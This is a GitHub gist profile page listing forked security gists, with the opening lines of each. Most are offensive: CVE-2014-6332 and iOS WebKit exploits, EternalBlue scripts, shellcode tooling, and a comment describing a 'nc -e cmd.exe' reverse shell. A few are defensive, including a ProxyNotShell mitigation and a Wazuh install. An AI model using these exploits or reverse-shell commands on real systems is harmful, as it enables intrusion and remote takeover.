🚩
Capture The Flag !

Halim Jabbes hxlxmj

hxlxmj / file_magic_numbers.md
Created July 25, 2022 06:50 — forked from leommoore/file_magic_numbers.md
File Magic Numbers

File Magic Numbers

Magic numbers are the first bits of a file which uniquely identify the type of file. This makes programming easier because complicated file structures need not be searched in order to identify the file type.

For example, a JPEG file starts with the bytes ffd8 ffe0 0010 4a46 4946 0001 0101 0047 (ASCII: ......JFIF.....G). ffd8 shows that it is a JPEG file, and ffe0 identifies a JFIF-type structure. An ASCII encoding of "JFIF" follows a length code, but it is not needed to identify the file: the first 4 bytes do that uniquely.

This gives an ongoing list of file-type magic numbers.

Image Files

hxlxmj / cve-2014-6332_exploit.html
Created August 5, 2022 01:44 — forked from worawit/cve-2014-6332_exploit.html
CVE-2014-6332 IE exploit to get shell (packed everything in one html)
<html>
<head>
<!--
CVE-2014-6332 exploit to bypass IE Protected Mode if enabled (with localhost), then get a shell
The exploit drops nc.exe, then executes "nc -e cmd.exe -n ip port"
'server_ip' and 'server_port' in the JavaScript below determine the connect-back target
Tested on
- IE11 + Windows 7 64-bit (EPM is off)
- IE11 + Windows 8.1 64-bit (EPM is off)
hxlxmj / eternalblue7_exploit.py
Created August 5, 2022 01:44 — forked from worawit/eternalblue7_exploit.py
Eternalblue exploit for Windows 7/2008
#!/usr/bin/python
# This file has no update anymore. Please see https://github.com/worawit/MS17-010
from impacket import smb
from struct import pack
import sys
import socket
'''
EternalBlue exploit for Windows 7/2008 by sleepya
The exploit might FAIL and CRASH a target system (depending on what is overwritten)
hxlxmj / eternalblue8_exploit.py
Created August 5, 2022 01:44 — forked from worawit/eternalblue8_exploit.py
Eternalblue exploit for Windows 8/2012
#!/usr/bin/python
# This file has no update anymore. Please see https://github.com/worawit/MS17-010
from impacket import smb, ntlm
from struct import pack
import sys
import socket
'''
EternalBlue exploit for Windows 8 and 2012 by sleepya
The exploit might FAIL and CRASH a target system (depending on what is overwritten)
hxlxmj / eternalblue_merge_shellcode.py
Created August 5, 2022 01:44 — forked from worawit/eternalblue_merge_shellcode.py
Windows x64 and x86 kernel shellcode for eternalblue exploit
# This file has no update anymore. Please see https://github.com/worawit/MS17-010
import sys
from struct import pack
if len(sys.argv) < 4:
    print('Usage: {} sc_x86 sc_x64 sc_out'.format(sys.argv[0]))
    sys.exit()
sc_x86 = open(sys.argv[1], 'rb').read()
sc_x64 = open(sys.argv[2], 'rb').read()
hxlxmj / ClippyShellcodeInject.cs
Created August 14, 2022 04:55
Clipboard Shellcode Injection
// Using the clipboard as your code cave.
// Generate your shellcode with msfvenom or whatever
// Example: msfvenom -p windows/x64/exec CMD=calc exitfunc=thread -f raw -o <outputfile.bin>
// Compile: C:\windows\Microsoft.NET\Framework64\v3.5\csc.exe C:\Path\To\ClippyShellcodeInject.cs
using System;
using System.IO;
using System.Runtime.InteropServices;
namespace ClippySCInject
hxlxmj / ProxyNotShell_exchangePowerShell_BlockNonAdmins.ps1
Created October 8, 2022 10:19 — forked from ConanChiles/ProxyNotShell_exchangePowerShell_BlockNonAdmins.ps1
ProxyNotShell - disable Exchange PowerShell access for all users, excluding Exchange admins (derived from Exchange roles)
<# block non-Exchange admins from PowerShell access in Exchange
ProxyNotShell
CVE-2022-41040
CVE-2022-41082
Some bypasses have been found for the IIS block rules.
Need to hard block PowerShell for those that don't **need** it.
Exchange allows PowerShell by default, so block by exception. Not ideal, but workable.
hxlxmj / wazuhinstall.sh
Last active October 15, 2022 04:29 — forked from austinsonger/wazuhinstall.sh
Wazuh Install - Single Server
# Requirements
sudo apt install curl apt-transport-https unzip wget libcap2-bin software-properties-common lsb-release -y
sudo apt install gpgv gpgsm gnupg-l10n gnupg dirmngr -y
add-apt-repository ppa:openjdk-r/ppa
sudo apt update -y
sudo curl -so /etc/profile.d/myenvvars.sh https://gist.githubusercontent.com/austinsonger/2385ff1ef5ccb014aaed4d8684dd6e54/raw/e1d9b85b3383d1a50a54eac68ab7ad7c3e0c2797/myenvvars.sh
export JAVA_HOME=/usr/
sudo apt install openjdk-11-jdk -y
# Wazuh Prep
hxlxmj / fuck.js
Created November 19, 2022 15:14 — forked from ujin5/fuck.js
WebKit RCE on ios 14.1
function sleep( sleepDuration ){
    var now = new Date().getTime();
    while(new Date().getTime() < now + sleepDuration){ /* do nothing */ }
}
function gc() {
    for (let i = 0; i < 0x10; i++) {
        new ArrayBuffer(0x1000000);
    }
}
let data_view = new DataView(new ArrayBuffer(8));